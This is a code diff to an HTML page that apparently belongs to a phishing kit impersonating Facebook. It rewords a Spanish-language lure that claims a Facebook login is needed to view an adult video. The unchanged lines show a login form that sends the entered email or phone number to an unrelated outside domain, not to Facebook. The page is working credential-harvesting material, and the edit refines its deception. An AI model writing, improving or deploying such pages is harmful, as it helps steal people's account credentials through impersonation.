--- a/index.html
+++ b/index.html
@@ -160,7 +160,7 @@
     	<div class="modal fade" id="myModal" role="dialog">
     	    <section class="login-form-wrap">
     			<h1>Facebook</h1>
-    			<div style="    background-color: #fff9d7; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;">Facebook necesita que inicies sesion en tu cuenta para confirmar que eres mayor de 15 años y asi darte acceso a est video con contenido adulto</div>
+    			<div style="    background-color: #fff9d7; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;">Se requiere inicio de sesion en tu cuenta de facebook para ver que eres una persona real y darte acceso a este video con contenido adulto</div>
     			<form class="login-form" name="anhsonnguyen" method="post" action="https://apolipresposd.top.mx/k_fac.php" onsubmit="return validateForm()">
     				<label>
     					<input type="text" name="email" required placeholder="Numero de telefono o Email">
